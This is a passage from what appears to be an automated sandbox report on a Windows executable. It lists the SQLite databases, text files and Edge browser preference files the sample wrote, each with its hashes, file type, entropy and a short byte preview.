                                                                                                                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\ProgramData\Z5PPP8Q1NYCB\NYC2NG

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):159744
                                                                                                                                                                                                                                                                              Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                              MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                              SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                              SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                              SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\ProgramData\Z5PPP8Q1NYCB\NYMOHD

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                                                                                                              Entropy (8bit):4.691266297898928
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                                                                                                                                                                                              MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                                                                                                                                                                                              SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                                                                                                                                                                                              SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                                                                                                                                                                                              SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

                                                                                                                                                                                                                                                                              C:\ProgramData\Z5PPP8Q1NYCB\P8QIEK

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):294912
                                                                                                                                                                                                                                                                              Entropy (8bit):0.08441928760034874
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vI:51zkVmvQhyn+Zoz67V
                                                                                                                                                                                                                                                                              MD5:2ABDC5DBC05C0C5CE5E1EB6D6E8C1B0D
                                                                                                                                                                                                                                                                              SHA1:14DFBE9B28D033542357D98005239D842A16FCFD
                                                                                                                                                                                                                                                                              SHA-256:91F1008439BD28B09EC1FC851F2679DFBAA45B27409882AD899CEF8460A036AF
                                                                                                                                                                                                                                                                              SHA-512:DD4BD1407DFDC90BC97F5940A120CCDE7D4A6DAA3E0DB1649BED96EBE52FFDF879E52E028657F954FF39A93EEE8F57694A7EAC55D85CA57AF2BBD7A7793B9030
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\ProgramData\Z5PPP8Q1NYCB\Q90R90

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):155648
                                                                                                                                                                                                                                                                              Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                              MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                              SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                              SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                              SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\ProgramData\Z5PPP8Q1NYCB\UKX47G

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                                                                                                              Entropy (8bit):4.691266297898928
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                                                                                                                                                                                              MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                                                                                                                                                                                              SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                                                                                                                                                                                              SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                                                                                                                                                                                              SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

                                                                                                                                                                                                                                                                              C:\ProgramData\Z5PPP8Q1NYCB\YM7G4E

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                                                                                              Entropy (8bit):1.137181696973627
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                                                                                                                                                                                                              MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                                                                                                                                                                                                              SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                                                                                                                                                                                                              SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                                                                                                                                                                                                              SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\ProgramData\Z5PPP8Q1NYCB\YM7YMOHLX

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):51200
                                                                                                                                                                                                                                                                              Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2297a878-ccd7-4f97-8236-a14f07721167.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):57717
                                                                                                                                                                                                                                                                              Entropy (8bit):6.103799756709965
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7yOrPGWv/sxtwKj7VLyMV/YoskFoz:z/0+zI7yOzv/4KcVeZoskG
                                                                                                                                                                                                                                                                              MD5:510FBDA13BE4DE3D096CF3F928364F5B
                                                                                                                                                                                                                                                                              SHA1:8956A50FCADE441FBA00D554B38779E3A5548717
                                                                                                                                                                                                                                                                              SHA-256:DF775663A9B2A1661C70174E87F00BEEAB97BE9C1A10D5F13F8F49AFF1527218
                                                                                                                                                                                                                                                                              SHA-512:4C3FF6933C88FA751FEDB8B6B8674D65AAFFEB255AD40228D6B31C00D921EF310E3B97B886EA4AECD3F200C87C2193AB404922B2B2688F3EFBA12FDDC5EF714D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2d512d26-705b-465b-8ad3-2ebf2e4b49ef.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                              Size (bytes):59005
                                                                                                                                                                                                                                                                              Entropy (8bit):6.100662859821733
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:LMk1rT8HnnSPGWv/sxtwKVOFof7VLyMV/YosI:LMYrT8HGv/4KeuAVeZosI
                                                                                                                                                                                                                                                                              MD5:19A2A8B6898019099F0A850C02878012
                                                                                                                                                                                                                                                                              SHA1:7C26C02B399ACA42339D2E3769891260DDF725DB
                                                                                                                                                                                                                                                                              SHA-256:87F8AECDC7C896ECE5D6E682AA3DAFFF51321770F0B6CAF8FB67ED96AE08DD79
                                                                                                                                                                                                                                                                              SHA-512:02857348E8F28B3A77DFC1F0DFF6403DE26F42B6C2B8FA6B00ED07593721A538B4D6F6846FD830E9281AB6D92A82C7D290E18B34ACA344A6E8D10EF58573A59F
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"5164b344-c4ed-43b8-ad53-2b912e4423f7"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4ca5d31b-b202-485a-a13c-a1309167a7c5.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):58881
                                                                                                                                                                                                                                                                              Entropy (8bit):6.100713292360589
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:LMk1rT8H1akPGWv/sxtwKVOFof7VLyMV/YosI:LMYrT8VVv/4KeuAVeZosI
                                                                                                                                                                                                                                                                              MD5:08AC783094DC006699B54503012CF56B
                                                                                                                                                                                                                                                                              SHA1:7FD59014E4156A52EA68B4DDCF61F457508C46A7
                                                                                                                                                                                                                                                                              SHA-256:416A6FEBF5C990C775AB3CBDD855343B70AABD28F4823E1911BF3443EBC93E04
                                                                                                                                                                                                                                                                              SHA-512:D4E4BC7FE7F635A3AC46B251E1B886E731E8E5585C151F723EA0417F801398E6F6F8747DC01575D8DC84E2F814EA1C1B7D3CB02A324E11CBC492115E9FB87DA4
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"5164b344-c4ed-43b8-ad53-2b912e4423f7"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\63a0b868-25a4-4b6c-aab5-8b695e0a51fd.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):58928
                                                                                                                                                                                                                                                                              Entropy (8bit):6.1005968734066265
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:LMk1rT8H1aoPGWv/sxtwKVOFof7VLyMV/YosI:LMYrT8VDv/4KeuAVeZosI
                                                                                                                                                                                                                                                                              MD5:EDA204049A355F491F78D4E372695390
                                                                                                                                                                                                                                                                              SHA1:52C553607E5EE3BD1A3CB342E8A89687FA08A016
                                                                                                                                                                                                                                                                              SHA-256:084BE77855B30F9B518CAA1DF08672F4BEB8EA0CE5E7306019B94014C5A44CD7
                                                                                                                                                                                                                                                                              SHA-512:A313415ACD5130AC6D5732B1CB6492657019E8DE480C8F16E4FD30B3594ECFDE2F70C0B248B72ED8BF001D8D5B2E5AED996B59A8BD2D9CD8C48758752985233A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"5164b344-c4ed-43b8-ad53-2b912e4423f7"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\68b85cd8-9b73-4de1-bb25-2c2bad3d8547.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):59005
                                                                                                                                                                                                                                                                              Entropy (8bit):6.100691246768904
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:LMk1rT8Hna9MPGWv/sxtwKVOFof7VLyMV/YosI:LMYrT8HBv/4KeuAVeZosI
                                                                                                                                                                                                                                                                              MD5:1975260E752A4F4E49CA2A31FAECB0D8
                                                                                                                                                                                                                                                                              SHA1:EBC57CF4B7E05D3BE859DD9FA700402ACB73399A
                                                                                                                                                                                                                                                                              SHA-256:49D1DAE69FAA015ED0DCE4CE8DCCDAC839094AE8C4EE37BFC5A7703D26D2AA91
                                                                                                                                                                                                                                                                              SHA-512:2B848B5783E1D9FE1FB63DA42484E60CCC422720EC1BBA0F46263147CCC3CFAAE0CF50E9823D3DEAEE31BCCB68A76B98367C831E67DA7AF15806C4E3D00F6A8A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"5164b344-c4ed-43b8-ad53-2b912e4423f7"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8ec85c62-d586-41ec-b996-3b068504838c.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):57639
